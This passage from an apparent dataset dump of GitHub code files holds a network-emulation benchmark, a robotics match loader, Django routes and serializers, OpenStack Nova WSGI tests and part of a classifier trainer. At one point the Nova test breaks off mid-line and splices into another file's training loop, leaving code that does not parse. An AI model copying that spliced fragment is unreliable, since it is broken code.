subprocess.call(cmd.split(\" \"))\n for ID in stream_id:\n print(\"%s,%s,%s\" % (ID, stream_congestion[ID][\"start\"],\n stream_congestion[ID][\"end\"]))\n\n\nif __name__ == \"__main__\":\n # Load the controller config and retrieve the script arguments\n CONTROLLERS = load_ctrls(\"controllers_te.yaml\")\n parser = ArgumentParser(\"Mininet Emulator: Iperf TE benchmark\")\n parser.add_argument(\"--topo\", required=True, type=str,\n help=\"Topology module to use for emulation\")\n parser.add_argument(\"--controller\", required=True, type=str,\n help=\"Controller to use for emulation (%s)\"\n % get_ctrl_names(CONTROLLERS))\n parser.add_argument(\"--scenario\", required=True, type=str,\n help=\"TE scenario YAML file\")\n parser.add_argument(\"--sw_ctrl_map\", type=str, default=None,\n help=\"Switch-controller JSON map file (use multiple controllers)\")\n parser.add_argument(\"--ctrl_options\", type=str, default=None,\n help=\"netem options to apply to control channel (i.e. delay 10ms)\")\n parser.add_argument(\"--log_level\", type=str, default=\"critical\",\n help=\"Emulator log level (debug, info, warning, error, critical)\")\n parser.add_argument(\"--ctrl_log_level\", type=str, default=\"critical\",\n help=\"Controller log level (debug, info, warning, error, critical)\")\n parser.add_argument(\"--config_file\", type=str,\n default=\"EmulatorConfigs/config.TE.yaml\",\n help=\"Framework config file (specify start cmd and config attr)\")\n args = parser.parse_args()\n\n # Load the topology module, TE scenario and validate attributes/run\n topoMod = path_to_import_notation(args.topo)\n topo = importlib.import_module(topoMod)\n topo = topo.NetTopo()\n\n controller_name = args.controller.lower()\n if controller_name not in CONTROLLERS:\n lg.critical(\"Invalid controller name received!\\n\")\n exit()\n\n SCENARIO = load_scenario(args.scenario)\n if \"usable_on_topo\" in SCENARIO:\n if topo.name not in SCENARIO[\"usable_on_topo\"]:\n exit()\n validate_scenario(SCENARIO, controller_name, topo)\n\n ctrl_channel_options = None\n if args.ctrl_options:\n ctrl_channel_options = args.ctrl_options.lower()\n\n sw_ctrl_map = None\n if args.sw_ctrl_map is not None and os.path.isfile(args.sw_ctrl_map):\n sw_ctrl_map = args.sw_ctrl_map\n\n # Check if there any running instances of mininet, or the controller\n running_instance_check()\n setLogLevel(args.log_level)\n try:\n # Apply ports data to controllers if scenario specifies field\n ports_data = None\n if \"port_desc\" in SCENARIO:\n info(\"Port desc found in scenario, applying to controllers\\n\")\n ports_data = SCENARIO[\"port_desc\"]\n\n # Initiate controller manager, configure controllers and run experiment\n controllers = ControllerManager(ports_data=ports_data,\n map=sw_ctrl_map,\n ctrl_channel_opts=ctrl_channel_options,\n log_level=args.ctrl_log_level,\n config_file=args.config_file)\n\n # If TE config defined in scenario, ovewrite default attribute values\n interval = 1\n threshold = 0.90\n consolidate_time = 1\n if \"te_conf\" in SCENARIO:\n if \"interval\" in SCENARIO[\"te_conf\"]:\n interval = SCENARIO[\"te_conf\"][\"interval\"]\n if \"threshold\" in SCENARIO[\"te_conf\"]:\n threshold = SCENARIO[\"te_conf\"][\"threshold\"]\n if \"consolidate_time\" in SCENARIO[\"te_conf\"]:\n consolidate_time = SCENARIO[\"te_conf\"][\"consolidate_time\"]\n\n # Set controller configuration attributes\n controllers.set_ctrl_config(\"stats\", \"interval\", interval)\n controllers.set_ctrl_config(\"te\", \"utilisation_threshold\", threshold)\n controllers.set_ctrl_config(\"te\", \"consolidate_time\", consolidate_time)\n controllers.set_ctrl_cmd_module(get_ctrl_module(CONTROLLERS,\n controller_name))\n net = controllers.start(topo)\n run(controller_name)\n except:\n # Show the erro, cleanup and exit the app\n print(\"ERROR!,Exception occured while running emulation\")\n lg.critical(\"%s\\n\" % traceback.format_exc())\n cleanup()\n","repo_name":"wandsdn/helix","sub_path":"EmulateTE.py","file_name":"EmulateTE.py","file_ext":"py","file_size_in_byte":22435,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"18336854227","text":"import datetime\nimport statistics\n\nfrom classes import Match\nimport read_tba\nimport utils\n\n\ndef getEvents(year):\n events = []\n for event in read_tba.get(\"events/\"+str(year)+\"/simple\"):\n if(event[\"event_type\"] <= 10):\n events.append(event[\"key\"])\n return events\n\n\ndef getTeams(event):\n return read_tba.get(\"event/\"+str(event)+\"/teams/keys\")\n\n\ndef getEventTime(event):\n # for pre 2016 events\n date = read_tba.get(\"event/\"+str(event)+\"/simple\")[\"start_date\"]\n return int(datetime.datetime.strptime(date, \"%Y-%m-%d\").timestamp())\n\n\ndef getMatchTime(match, event_time):\n if match[\"actual_time\"] is not None:\n return match[\"actual_time\"]\n\n match_time = event_time # start value\n if match[\"comp_level\"] == \"qm\":\n match_time += match[\"match_number\"]\n elif match[\"comp_level\"] == \"qf\":\n match_time += 200 + 10 * match[\"set_number\"] + match[\"match_number\"]\n elif match[\"comp_level\"] == \"sf\":\n match_time += 400 + 10 * match[\"set_number\"] + match[\"match_number\"]\n else:\n match_time += 600 + match[\"match_number\"]\n\n return match_time\n\n\ndef getMatchesEvent(year, event):\n matches = []\n event_time = getEventTime(event)\n for match in read_tba.get(\"event/\"+str(event)+\"/matches/simple\"):\n # correctly orders matches pre 2016\n match[\"actual_time\"] = getMatchTime(match, event_time)\n red_teams = len(match[\"alliances\"][\"red\"][\"team_keys\"])\n blue_teams = len(match[\"alliances\"][\"blue\"][\"team_keys\"])\n\n if(year > 2004 and red_teams == 3 and blue_teams == 3):\n matches.append(Match(match))\n elif(year <= 2004 and red_teams >= 2 and blue_teams >= 2):\n matches.append(Match(match))\n\n matches.sort()\n return matches\n\n\ndef getMatchesYear(year):\n matches = []\n events = getEvents(year)\n for event in events:\n for match in getMatchesEvent(year, event):\n matches.append(match)\n matches.sort()\n return matches\n\n\ndef saveMatches(start_year, end_year):\n for year in range(start_year, end_year+1):\n print(year)\n matches = getMatchesYear(year)\n utils.saveMatches(year, matches)\n\n\ndef getSD(year):\n scores = []\n for match in getMatchesYear(year):\n print(year)\n scores.append(match.red_score)\n scores.append(match.blue_score)\n return statistics.pstdev(scores)\n\n\ndef getSDs(start_year, end_year):\n for year in range(start_year, end_year+1):\n print(str(year)+\":\\t\"+str(getSD(year)))\n\n\ndef main():\n # getSDs(2002, 2020)\n saveMatches(2002, 2020)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"poofyjacket/statbotics","sub_path":"statbotics_elo/calculate/load_matches.py","file_name":"load_matches.py","file_ext":"py","file_size_in_byte":2626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"19890630440","text":"from django.urls import path, re_path\nfrom . import views\n# 查看餐厅列表\n# 查看餐厅详情, 如/myrestaurants/restaurant/1/\n# 创建餐厅, 如:/myrestaurants/restaurant/create/\n# 编辑餐厅详情, 如: /myrestaurants/restaurant/1/edit/\n# 前4个功能性页面的URL见教程第一部分\n# 创建菜品 ex.: /myrestaurants/restaurant/1/dishes/create/\n# 编辑菜品, ex.: /myrestaurants/restaurant/1/dishes/1/edit/\n# 查看菜品信息 ex: /myrestaurants/restaurants/1/dishes/1/\n# 创建餐厅评论, /myrestaurants/restaurant/1/reviews/create/\n# namespace\napp_name = 'rest'\nurlpatterns = [\n re_path(r'^rest/$', views.RestaurantList.as_view(), name='restaurant_list'),\n re_path(r'^rest/list/$', views.res_list, name='res_list'),\n re_path(r'^rest/createreview/$', views.rest_review, name='createreview'),\n re_path(r'^rest/(?P\\d+)/create_review/$', views.rest_review, name='create_review'),\n re_path(r'^rest/(?P\\d+)/$',views.RestaurantDetail.as_view(), name='restaurant_detail'),\n re_path(r'^rest/create/$', views.RestaurantCreate.as_view(), name='restaurant_create'),\n re_path(r'^rest/(?P\\d+)/edit/$',views.RestaurantEdit.as_view(), name='restaurant_edit'),\n re_path(r'^rest/(?P\\d+)/dishes/create/$',views.DishCreate.as_view(), name='dish_create'),\n re_path(r'^rest/(?P\\d+)/dishes/(?P\\d+)/edit/$',views.DishEdit.as_view(), name='dish_edit'),\n re_path(r'^rest/(?P\\d+)/dishes/(?P\\d+)/$',views.DishDetail.as_view(), name='dish_detail'),\n re_path(r'^rest/(?P\\d+)/reviews/create/$',views.review_create, name='review_create'),\n re_path(r'^rest/deliver_review/$', views.deliver_review, name='deliver_review'),\n\n]\n\n\n","repo_name":"LiuWenJingI/GraduationDesign","sub_path":"guan/rest/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28563470267","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport inspect\n\nimport mock\nimport six\nimport webob\n\nfrom nova.api.openstack import api_version_request as api_version\nfrom nova.api.openstack import extensions\nfrom nova.api.openstack import wsgi\nfrom nova import exception\nfrom nova import i18n\nfrom nova import test\nfrom nova.tests.unit.api.openstack import fakes\nfrom nova.tests.unit import matchers\nfrom nova.tests.unit import utils\nfrom oslo_serialization import jsonutils\n\n\nclass RequestTest(test.NoDBTestCase):\n header_name = 'X-OpenStack-Nova-API-Version'\n\n def test_content_type_missing(self):\n request = wsgi.Request.blank('/tests/123', method='POST')\n request.body = b\"\"\n self.assertIsNone(request.get_content_type())\n\n def test_content_type_unsupported(self):\n request = wsgi.Request.blank('/tests/123', method='POST')\n request.headers[\"Content-Type\"] = \"text/html\"\n request.body = b\"asdf
\"\n self.assertRaises(exception.InvalidContentType,\n request.get_content_type)\n\n def test_content_type_with_charset(self):\n request = wsgi.Request.blank('/tests/123')\n request.headers[\"Content-Type\"] = \"application/json; charset=UTF-8\"\n result = request.get_content_type()\n self.assertEqual(result, \"application/json\")\n\n def test_content_type_accept_default(self):\n request = wsgi.Request.blank('/tests/123.unsupported')\n request.headers[\"Accept\"] = \"application/unsupported1\"\n result = request.best_match_content_type()\n self.assertEqual(result, \"application/json\")\n\n def test_cache_and_retrieve_instances(self):\n request = wsgi.Request.blank('/foo')\n instances = []\n for x in range(3):\n instances.append({'uuid': 'uuid%s' % x})\n # Store 2\n request.cache_db_instances(instances[:2])\n # Store 1\n request.cache_db_instance(instances[2])\n self.assertEqual(request.get_db_instance('uuid0'),\n instances[0])\n self.assertEqual(request.get_db_instance('uuid1'),\n instances[1])\n self.assertEqual(request.get_db_instance('uuid2'),\n instances[2])\n self.assertIsNone(request.get_db_instance('uuid3'))\n self.assertEqual(request.get_db_instances(),\n {'uuid0': instances[0],\n 'uuid1': instances[1],\n 'uuid2': instances[2]})\n\n def test_cache_and_retrieve_compute_nodes(self):\n request = wsgi.Request.blank('/foo')\n compute_nodes = []\n for x in range(3):\n compute_nodes.append({'id': 'id%s' % x})\n # Store 2\n request.cache_db_compute_nodes(compute_nodes[:2])\n # Store 1\n request.cache_db_compute_node(compute_nodes[2])\n self.assertEqual(request.get_db_compute_node('id0'),\n compute_nodes[0])\n self.assertEqual(request.get_db_compute_node('id1'),\n compute_nodes[1])\n self.assertEqual(request.get_db_compute_node('id2'),\n compute_nodes[2])\n self.assertIsNone(request.get_db_compute_node('id3'))\n self.assertEqual(request.get_db_compute_nodes(),\n {'id0': compute_nodes[0],\n 'id1': compute_nodes[1],\n 'id2': compute_nodes[2]})\n\n def test_from_request(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'bogus;q=1.1, en-gb;q=0.7,en-us,en;q=.5,*;q=.7'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_US')\n\n def test_asterisk(self):\n # asterisk should match first available if there\n # are not any other available matches\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = '*,es;q=.5'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_GB')\n\n def test_prefix(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'zh'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'zh_CN')\n\n def test_secondary(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'nn,en-gb;q=.5'\n request.headers = {'Accept-Language': accepted}\n self.assertEqual(request.best_match_language(), 'en_GB')\n\n def test_none_found(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = 'nb-no'\n request.headers = {'Accept-Language': accepted}\n self.assertIs(request.best_match_language(), None)\n\n def test_no_lang_header(self):\n self.stubs.Set(i18n, 'get_available_languages',\n fakes.fake_get_available_languages)\n\n request = wsgi.Request.blank('/')\n accepted = ''\n request.headers = {'Accept-Language': accepted}\n self.assertIs(request.best_match_language(), None)\n\n def test_api_version_request_header_none(self):\n request = wsgi.Request.blank('/')\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\n api_version.DEFAULT_API_VERSION), request.api_version_request)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_api_version_request_header(self, mock_maxver):\n mock_maxver.return_value = api_version.APIVersionRequest(\"2.14\")\n\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: '2.14'}\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\"2.14\"),\n request.api_version_request)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_api_version_request_header_latest(self, mock_maxver):\n mock_maxver.return_value = api_version.APIVersionRequest(\"3.5\")\n\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: 'latest'}\n request.set_api_version_request()\n self.assertEqual(api_version.APIVersionRequest(\"3.5\"),\n request.api_version_request)\n\n def test_api_version_request_header_invalid(self):\n request = wsgi.Request.blank('/')\n request.headers = {self.header_name: '2.1.3'}\n\n self.assertRaises(exception.InvalidAPIVersionString,\n request.set_api_version_request)\n\n\nclass ActionDispatcherTest(test.NoDBTestCase):\n def test_dispatch(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n self.assertEqual(serializer.dispatch({}, action='create'), 'pants')\n\n def test_dispatch_action_None(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n serializer.default = lambda x: 'trousers'\n self.assertEqual(serializer.dispatch({}, action=None), 'trousers')\n\n def test_dispatch_default(self):\n serializer = wsgi.ActionDispatcher()\n serializer.create = lambda x: 'pants'\n serializer.default = lambda x: 'trousers'\n self.assertEqual(serializer.dispatch({}, action='update'), 'trousers')\n\n\nclass JSONDictSerializerTest(test.NoDBTestCase):\n def test_json(self):\n input_dict = dict(servers=dict(a=(2, 3)))\n expected_json = '{\"servers\":{\"a\":[2,3]}}'\n serializer = wsgi.JSONDictSerializer()\n result = serializer.serialize(input_dict)\n result = result.replace('\\n', '').replace(' ', '')\n self.assertEqual(result, expected_json)\n\n\nclass JSONDeserializerTest(test.NoDBTestCase):\n def test_json(self):\n data = \"\"\"{\"a\": {\n \"a1\": \"1\",\n \"a2\": \"2\",\n \"bs\": [\"1\", \"2\", \"3\", {\"c\": {\"c1\": \"1\"}}],\n \"d\": {\"e\": \"1\"},\n \"f\": \"1\"}}\"\"\"\n as_dict = {\n 'body': {\n 'a': {\n 'a1': '1',\n 'a2': '2',\n 'bs': ['1', '2', '3', {'c': {'c1': '1'}}],\n 'd': {'e': '1'},\n 'f': '1',\n },\n },\n }\n deserializer = wsgi.JSONDeserializer()\n self.assertEqual(deserializer.deserialize(data), as_dict)\n\n def test_json_valid_utf8(self):\n data = b\"\"\"{\"server\": {\"min_count\": 1, \"flavorRef\": \"1\",\n \"name\": \"\\xe6\\xa6\\x82\\xe5\\xbf\\xb5\",\n \"imageRef\": \"10bab10c-1304-47d\",\n \"max_count\": 1}} \"\"\"\n as_dict = {\n 'body': {\n u'server': {\n u'min_count': 1, u'flavorRef': u'1',\n u'name': u'\\u6982\\u5ff5',\n u'imageRef': u'10bab10c-1304-47d',\n u'max_count': 1\n }\n }\n }\n deserializer = wsgi.JSONDeserializer()\n self.assertEqual(deserializer.deserialize(data), as_dict)\n\n def test_json_invalid_utf8(self):\n \"\"\"Send invalid utf-8 to JSONDeserializer.\"\"\"\n data = b\"\"\"{\"server\": {\"min_count\": 1, \"flavorRef\": \"1\",\n \"name\": \"\\xf0\\x28\\x8c\\x28\",\n \"imageRef\": \"10bab10c-1304-47d\",\n \"max_count\": 1}} \"\"\"\n\n deserializer = wsgi.JSONDeserializer()\n self.assertRaises(exception.MalformedRequestBody,\n deserializer.deserialize, data)\n\n\nclass ResourceTest(test.NoDBTestCase):\n header_name = 'X-OpenStack-Nova-API-Version'\n\n def get_req_id_header_name(self, request):\n header_name = 'x-openstack-request-id'\n if utils.get_api_version(request) < 3:\n header_name = 'x-compute-request-id'\n\n return header_name\n\n def test_resource_receives_api_version_request_default(self):\n class Controller(object):\n def index(self, req):\n if req.api_version_request != \\\n api_version.APIVersionRequest(\n api_version.DEFAULT_API_VERSION):\n raise webob.exc.HTTPInternalServerError()\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n @mock.patch(\"nova.api.openstack.api_version_request.max_api_version\")\n def test_resource_receives_api_version_request(self, mock_maxver):\n version = \"2.5\"\n mock_maxver.return_value = api_version.APIVersionRequest(version)\n\n class Controller(object):\n def index(self, req):\n if req.api_version_request != \\\n api_version.APIVersionRequest(version):\n raise webob.exc.HTTPInternalServerError()\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n req.headers = {self.header_name: version}\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n def test_resource_receives_api_version_request_invalid(self):\n invalid_version = \"2.5.3\"\n\n class Controller(object):\n def index(self, req):\n return 'success'\n\n app = fakes.TestRouterV21(Controller())\n req = webob.Request.blank('/tests')\n req.headers = {self.header_name: invalid_version}\n response = req.get_response(app)\n self.assertEqual(400, response.status_int)\n\n def test_resource_call_with_method_get(self):\n class Controller(object):\n def index(self, req):\n return 'success'\n\n app = fakes.TestRouter(Controller())\n # the default method is GET\n req = webob.Request.blank('/tests')\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.content_type = 'application/json'\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n\n def test_resource_call_with_method_post(self):\n class Controller(object):\n @extensions.expected_errors(400)\n def create(self, req, body):\n if expected_body != body:\n msg = \"The request body invalid\"\n raise webob.exc.HTTPBadRequest(explanation=msg)\n return \"success\"\n # verify the method: POST\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests', method=\"POST\",\n content_type='application/json')\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n expected_body = {'body': {\n \"key\": \"value\"\n }\n }\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # verify without body\n expected_body = None\n req.body = None\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # the body is validated in the controller\n expected_body = {'body': None}\n response = req.get_response(app)\n expected_unsupported_type_body = {'badRequest':\n {'message': 'The request body invalid', 'code': 400}}\n self.assertEqual(response.status_int, 400)\n self.assertEqual(expected_unsupported_type_body,\n jsonutils.loads(response.body))\n\n def test_resource_call_with_method_put(self):\n class Controller(object):\n def update(self, req, id, body):\n if expected_body != body:\n msg = \"The request body invalid\"\n raise webob.exc.HTTPBadRequest(explanation=msg)\n return \"success\"\n # verify the method: PUT\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests/test_id', method=\"PUT\",\n content_type='application/json')\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n expected_body = {'body': {\n \"key\": \"value\"\n }\n }\n response = req.get_response(app)\n self.assertEqual(b'success', response.body)\n self.assertEqual(response.status_int, 200)\n req.body = None\n expected_body = None\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n # verify no content_type is contained in the request\n req = webob.Request.blank('/tests/test_id', method=\"PUT\",\n content_type='application/xml')\n req.content_type = 'application/xml'\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n expected_unsupported_type_body = {'badRequest':\n {'message': 'Unsupported Content-Type', 'code': 400}}\n self.assertEqual(response.status_int, 400)\n self.assertEqual(expected_unsupported_type_body,\n jsonutils.loads(response.body))\n\n def test_resource_call_with_method_delete(self):\n class Controller(object):\n def delete(self, req, id):\n return \"success\"\n\n # verify the method: DELETE\n app = fakes.TestRouter(Controller())\n req = webob.Request.blank('/tests/test_id', method=\"DELETE\")\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n # ignore the body\n req.body = b'{\"body\": {\"key\": \"value\"}}'\n response = req.get_response(app)\n self.assertEqual(response.status_int, 200)\n self.assertEqual(b'success', response.body)\n\n def test_resource_not_authorized(self):\n class Controller(object):\n def index(self, req):\n raise exception.Forbidden()\n\n req = webob.Request.blank('/tests')\n app = fakes.TestRouter(Controller())\n response = req.get_response(app)\n self.assertEqual(response.status_int, 403)\n\n def test_dispatch(self):\n class Controller(object):\n def index(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'index', None, '')\n actual = resource.dispatch(method, None, {'pants': 'off'})\n expected = 'off'\n self.assertEqual(actual, expected)\n\n def test_get_method_unknown_controller_method(self):\n class Controller(object):\n def index(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(AttributeError, resource.get_method,\n None, 'create', None, '')\n\n def test_get_method_action_json(self):\n class Controller(wsgi.Controller):\n @wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'action',\n 'application/json',\n '{\"fooAction\": true}')\n self.assertEqual(controller._action_foo, method)\n\n def test_get_method_action_bad_body(self):\n class Controller(wsgi.Controller):\n @wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(exception.MalformedRequestBody, resource.get_method,\n None, 'action', 'application/json', '{}')\n\n def test_get_method_unknown_controller_action(self):\n class Controller(wsgi.Controller):\n @wsgi.action('fooAction')\n def _action_foo(self, req, id, body):\n return body\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n self.assertRaises(KeyError, resource.get_method,\n None, 'action', 'application/json',\n '{\"barAction\": true}')\n\n def test_get_method_action_method(self):\n class Controller(object):\n def action(self, req, pants=None):\n return pants\n\n controller = Controller()\n resource = wsgi.Resource(controller)\n method, extensions = resource.get_method(None, 'action',\n 'application/xml',\n 'true best_seen:\n print(f'New best validation seen class accuracy={acc_val_seen*100:.4f}% (train seen class accuracy={acc_train*100:.4f}%)')\n best_seen = acc_val_seen\n best_model = copy.deepcopy(self.model)\n else:\n best_model = torch.load(self.opt.rootpath + '/models/base-classifiers/' + self.opt.dataset + self.opt.image_embedding + f'_seed{self.seedinfo}_clr{self.opt.classifier_lr}_nep{self.nepoch}')\n\n return best_model\n \n def next_batch(self, batch_size):\n start = self.index_in_epoch\n # shuffle the data at the first epoch\n if self.epochs_completed == 0 and start == 0:\n perm = torch.randperm(self.ntrain)\n self.train_X = self.train_X[perm]\n self.train_Y = self.train_Y[perm]\n # the last batch\n if start + batch_size > self.ntrain:\n self.epochs_completed += 1\n rest_num_examples = self.ntrain - start\n if rest_num_examples > 0:\n X_rest_part = self.train_X[start:self.ntrain]\n Y_rest_part = self.train_Y[start:self.ntrain]\n # shuffle the data\n perm = torch.randperm(self.ntrain)\n self.train_X = self.train_X[perm]\n self.train_Y = self.train_Y[perm]\n # start next epoch\n start = 0\n self.index_in_epoch = batch_size - rest_num_examples\n end = self.index_in_epoch\n X_new_part = self.train_X[start:end]\n Y_new_part = self.train_Y[start:end]\n if rest_num_examples > 0:\n return torch.cat((X_rest_part, X_new_part), 0) , torch.cat((Y_rest_part, Y_new_part), 0)\n else:\n return X_new_part, Y_new_part\n else:\n self.index_in_epoch += batch_size\n end = self.index_in_epoch\n # from index start to index end-1\n return self.train_X[start:end], self.train_Y[start:end]\n","repo_name":"ExplainableML/ImageFreeZSL","sub_path":"utility/train_base.py","file_name":"train_base.py","file_ext":"py","file_size_in_byte":4624,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"29977942141","text":"from rest_framework import serializers\n\nfrom custom_auth.api.serializers import AddressSerializer\nfrom order.api.serializers import OrderHistorySerializer\nfrom product.api.serializers import ProductSerializer\nfrom warehouse.models import Vehicle, Driver, QCEntry, VehicleAssignment, Stock, StockInline, EggProductStockInline, \\\n Warehouse, WarehousePersonProfile, QCLine, Inventory, PackedInventory, DailyPaymentLine, DailyPayments, Expense, \\\n ExpenseRequest, ExpenseCategory, BankTransaction, BankDetails, BeatInventory, BeatInventoryLine, AdhocVehicle\n\nfrom warehouse.models.Wastage import Wastage\n\n\nclass VehicleSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = '__all__'\n\nclass AdhocVehicleSerializer(serializers.ModelSerializer):\n class Meta:\n model = AdhocVehicle\n fields = '__all__'\n\n\nclass VehicleOnboardSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = ('vehicle_desc', 'vehicle_no', 'vehicle_identifier', 'vehicle_photo_url', 'vendor',\n 'vendor_contact_no', 'per_day_charge', 'per_day_duration', 'per_day_distance', 'default_driver')\n\n\nclass DriverSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Driver\n fields = '__all__'\n\n\nclass InventorySerializer(serializers.ModelSerializer):\n class Meta:\n model = Inventory\n fields = '__all__'\n\n\nclass PackedInventorySerializer(serializers.ModelSerializer):\n product = serializers.SerializerMethodField()\n\n def get_product(self, obj):\n return ProductSerializer(obj.product).data\n\n class Meta:\n model = PackedInventory\n fields = '__all__'\n\n\nclass BeatInventorySerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BeatInventory\n fields = '__all__'\n\n\nclass BeatInventoryLineSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BeatInventoryLine\n fields = ('product', 'quantity')\n\n\nclass BeatInventoryHistorySerializer(serializers.ModelSerializer):\n inlines = serializers.SerializerMethodField()\n\n def get_inlines(self, obj):\n beatInventoryInlines = obj.beat_inventory_line.all()\n return BeatInventoryLineSerializer(beatInventoryInlines, many=True).data\n\n class Meta:\n model = BeatInventory\n fields = ('beat_details', 'date' , 'inventory_status', 'warehouse', 'inlines', 'entered_by')\n\n\nclass DriverOnboardSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = ('driver_name', 'driver_desc', 'driver_no', 'driver_license_no', 'driver_photo', 'license_photo')\n\n\nclass DriverShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = Driver\n fields = ('driver_name', 'driver_no','id')\n\nclass VehicleShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = Vehicle\n fields = ('id', 'vehicle_no', 'vehicle_identifier_type', 'vendor', 'vehicle_status')\n\n\nclass AdhocVehicleShortSerializer(serializers.ModelSerializer):\n class Meta:\n model = AdhocVehicle\n fields = ('id', 'vehicle_no', 'vehicle_identifier_type', 'vendor', 'vehicle_status')\n\n\n\nclass VehicleAssignmentSendDeliverySerializer(serializers.ModelSerializer):\n order = serializers.SerializerMethodField()\n\n def get_order(self, obj):\n orderInlines = obj.order_set.all()\n return OrderHistorySerializer(orderInlines, many=True).data\n\n class Meta:\n model = VehicleAssignment\n fields = ('driver', 'vehicle', 'operation_option', 'desc', 'delivery_person', 'order')\n\n\nclass VehicleAssignmentSerializer(serializers.ModelSerializer):\n driver = DriverSerializer()\n vehicle = VehicleSerializer()\n order = serializers.SerializerMethodField()\n\n def get_order(self, obj):\n orderInlines = obj.order_set.all()\n return OrderHistorySerializer(orderInlines, many=True).data\n\n class Meta:\n model = VehicleAssignment\n fields = '__all__'\n\n\nclass QCLineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = QCLine\n fields = ('name', 'ph_value')\n\n\nclass QCEntryValidationSerializer(serializers.ModelSerializer):\n qc_lines = QCLineValidationSerializer(many=True)\n\n class Meta:\n model = QCEntry\n fields = ('desc', 'qc_lines')\n\n def validate(self, data):\n\n qc_lines = data.get('qc_lines', None)\n if qc_lines is None:\n raise serializers.ValidationError(\"qc_lines required\")\n if len(qc_lines) < 1:\n raise serializers.ValidationError(\"QC In Lines can not be empty\")\n return data\n\n\nclass StockDuplicationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Stock\n fields = (\n 'batch_id', 'warehouse', 'farm', 'supplyPerson', 'warehousePerson', 'operationsPerson', 'driver', 'vehicle',\n 'productDivision')\n\n\nclass EggProductStockInlineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = EggProductStockInline\n fields = ('name', 'desc', 'sku_type', 'quantity')\n\n\nclass WastageInlineValidationSerializer(serializers.ModelSerializer):\n class Meta:\n model = Wastage\n fields = ('wastage_type', 